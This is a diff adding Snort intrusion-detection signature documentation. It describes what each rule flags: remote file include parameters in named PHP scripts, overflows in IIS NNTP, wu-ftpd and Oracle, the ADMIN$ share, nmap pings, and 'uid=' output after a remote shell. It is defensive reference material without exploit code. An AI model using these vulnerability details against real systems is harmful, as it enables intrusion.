+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Plume CMS" application running on a webserver. Access to the file "rss.php" using a remote file being passed as the "_PX_config[manager_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "_PX_config[manager_path]" parameter in the "rss.php" script used by the "Plume CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Plume CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2473.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2473
+
+--
+Summary:
+This event is generated when an attempt is made to access the ADMIN$
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/2927.txt
@@ -0,0 +1,66 @@
+Rule:  
+
+--
+Sid:
+2927
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft implementation of the Network News Transport
+Protocol (NNTP) for Internet Information Server (IIS).
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+The Microsoft implementation of NNTP for IIS contains a programming
+error in the processing of user supplied input that may present an
+attacker with multiple opportunites to execute code of their choosing on
+an affected system.
+
+--
+Affected Systems:
+. Microsoft Windows NT Server 4.0 NNTP component
+. Microsoft Windows 2000 Server NNTP component
+. Microsoft Windows Server 2003 NNTP Component
+. Microsoft Windows Server 2003 64-Bit Edition NNTP Component
+
+--
+Attack Scenarios:
+An attacker must supply specially crafted input to a vulnerable system
+to cause the overflow to occur.
+
+--
+Ease of Attack:
+Moderate. Example code exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CORE Technologies:
+http://www.coresecurity.com/common/showdoc.php?idx=420&idxseccion=10
+
+--
--- /dev/null
+++ b/doc/signatures/351.txt
@@ -0,0 +1,64 @@
+SID:
+351
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd
+--
+
+Impact:
+Possible execution of commands on the affected server as with elevated 
+user privileges
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) has a problem with very 
+log directory names. There is insufficent checking on directories 
+created by users allowing possible insertion of data into the stack.This
+can lead to execution of code with root / elevated user privileges.
+--
+
+Affected Systems:
+NcFTP Software NcFTPD 2.3.5
+Washington University wu-ftpd 2.4.2 (beta 18) VR10 
+RedHat wu-ftpd 2.4.2 b18-2 
+Washington University wu-ftpd 2.4.2 academ[BETA-18] 
+Probably others as well, susspect anything under Washington University wu-ftpd 2.6.0 for this particular exploit.
+--
+
+Attack Scenarios:
+A local attacker will attempt to create long named directories on the 
+ftp server wich are not checked correctly in the server code. This can 
+allow commands to be executed with elevated user privileges
+--
+
+Ease of Attack:
+simple, Exploit code exists
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to newest version of wuftpd, or replace with something more secure.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/1078.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1078
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1314.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1314
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "young teen".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "young teen".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/469.txt
@@ -0,0 +1,84 @@
+--
+Rule:
+
+--
+Sid:
+469
+
+--
+Summary:
+This event is generated when an ICMP ping typically generated by nmap is detected.
+
+--
+Impact:
+This could indicate a full scan by nmap which is sometimes indicative of
+potentially malicious behavior.
+
+--
+Detailed Information:
+Nmap's ICMP ping, by default, sends zero data as part of the ping.
+Nmap typically pings the host via icmp if the user has root
+privileges, and uses a tcp-ping otherwise.  
+
+--
+Attack Scenarios:
+As part of an information gathering attempt, an attacker may use nmap
+to see what hosts are alive on a given network.  If nmap is used for
+portscanning as root, the icmp ping will occur by default unless the
+user specifies otherwise (via '-P0').
+
+--
+Ease of Attack:
+Trivial.  Nmap requires little or no skill to operate.
+
+--
+False Positives:
+Possible.  The only current identifying feature of nmap's ICMP ping is
+that the data size is 0.  It is entirely possible that other tools may
+send icmp pings with zero data.
+
+Kontiki delivery manager used on windows platforms to download
+multimedia files is known to produce ICMP pings that can cause this
+rule to generate many events.
+
+avast! antivirus update feature is reported to produce ICMP pings with
+zero data when connecting to the avast servers. This can occur every 40
+seconds if no reply is received by the client.
+
+The avast! client attempts to ping one of the following servers:
+
+URL: http://www.asw.cz/iavs4pro
+IP: 195.70.130.34
+
+URL: http://www.avast.com/iavs4pro
+IP: 66.98.166.72
+
+URL: http://www.iavs.net/iavs4pro
+IP: 207.44.156.15
+
+URL: http://www.iavs.cz/iavs4pro
+IP: 62.168.45.69
+
+--
+False Negatives:
+None currently.
+
+--
+Corrective Action:
+If you detect other suspicous traffic from this host (i.e., a
+portscan), follow standard procedure to assess what threat this may
+pose.  If you only detect the icmp ping, this may have simply been a
+'ping sweep' and may be ignored.
+
+--
+Contributors:
+warchild@spoofed.org
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+www.insecure.org
+
+
+--
--- /dev/null
+++ b/doc/signatures/3093.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3093
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000408.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000408
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "AssoCIateD" application running on a webserver. Access to the file "cache_mngt.php" using a remote file being passed as the "root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root_path" parameter in the "cache_mngt.php" script used by the "AssoCIateD" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using AssoCIateD
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1882.txt
@@ -0,0 +1,79 @@
+Rule:  
+
+--
+Sid: 1882
+
+-- 
+
+Summary: 
+This event is generated by the use of a UNIX "id" command. This may be 
+indicative of post-compromise behavior where the attacker is checking 
+for super user privileges gained by a sucessful exploit against a 
+vulnerable system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained user access to the system.
+
+--
+Detailed Information:
+This event is generated when a UNIX "id" command is used to confirm the 
+user name of the currenly logged in user over an unencrypted connection. 
+This connection can either be a legitimate telnet connection or the 
+result of spawning a remote shell as a consequence of a successful 
+network exploit. 
+
+The string "uid=" is an output of an "id" command indicating that a 
+check is being made on the users current id.
+
+--
+
+Attack Scenarios: 
+A buffer overflow exploit against an FTP server results in "/bin/sh" 
+being executed. An automated script performing an attack, checks for the
+success of the exploit via an "id" command.
+
+-- 
+
+Ease of Attack: 
+Simple. This may be post-attack behavior and can be indicative of the 
+successful exploitation of a vulnerable system.
+
+-- 
+
+False Positives: 
+This rule will generate an event if a legitimate system administrator 
+executes the "id" command over an unencrypted connection to verify the 
+privilege level available to him.
+
+This rule may generate false positive events when some servers return 
+error messages that include uid and gid information. Qmail is one such 
+server application.
+
+This rule may also generate event by viewing the documentation on 
+snort.org.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Ensure that this event was not generated by a legitimate session then 
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Additional false positive information from Javier Fernandez-Sanguino
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/914.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+914
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/588.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+588
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) ttdbserverd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port ttdbserverd is using.  Attackers can also learn what versions of the ttdbserverd protocol are accepted by ttdbserverd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as ttdbserverd run.  The ttdbserverd RPC service, more commonly known as the ToolTalk database server, allows applications used in Common Desktop Environment (CDE) to communicate.  The ToolTalk service receives ToolTalk messages created and sent by applications and delivers them to the appropriate recipient applications.  The ToolTalk database server comes enabled on hosts with CDE.  Multiple vulernabilities have been associated with the ToolTalk database server. 
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where ttdbserverd runs.  This may be a precursor to accessing ttdbserverd.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ttdbserverd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ttdbserverd, not probes of the ttdbserverd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the ttdbserverd service itself. An attacker may attempt to go directly to the ttdbserverd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0717
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0003
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0687
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1075
+
+
+--
--- /dev/null
+++ b/doc/signatures/1555.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1555
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/695.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+695
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1656.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1656
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2537.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2537
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-Cert:
+http://www.kb.cert.org/vuls/id/150236
+
+--
--- /dev/null
+++ b/doc/signatures/100000145.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+100000145
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+directory traversal associated with Imail Web Calendaring
+servicel
+
+--
+Impact:
+A successful attack can permit a user to navigate outside
+of the web root directory and read files.
+
+--
+Detailed Information:
+The Imail Web Calendaring Server does not properly sanitize
+a malformed URL that contains directory traversal characters.
+This vulnerability is associated with static objects identified
+by names ending in .jsp, .jpg, .gif, .wav, .css, or .htm.  This
+can permit an unauthorized user to examine files that may contain
+sensitive information.
+
+--
+Affected Systems:
+Ipswitch IMail Server 8.2 and prior
+Ipswitch IMail Server 8.15 and prior
+
+--
+Attack Scenarios:
+An attacker send a URI containing a directory traversal to view
+sensitive files on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/1485.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+1485
+ 
+--
+Summary:
+This event is generated when an attempt is made to access the file mkilog.exe.
+
+--
+Impact:
+Remote access.  This attack may permit the execution of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
+This mkilog.exe is a Common Gateway Interface (CGI) script that can be used to view and modify SQL database contents.  It posts data to another module, ctss,idc, that creates a table based on the parameters passed to it.  If an attacker passes parameters such as a valid username and password to create a table, it may be possible to alter the table to execute commands on the vulnerable server.
+
+--
+Affected Systems:
+
+
+Attack Scenarios:
+An attacker can attempt to exploit this vulnerability to execute remote commands on the vulnerable server. 
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Delete file /scripts/tools/ctss.idc
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10359
+
+--
--- /dev/null
+++ b/doc/signatures/1512.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1512
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/864.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+864
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2889.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2889
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_date
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000792.txt
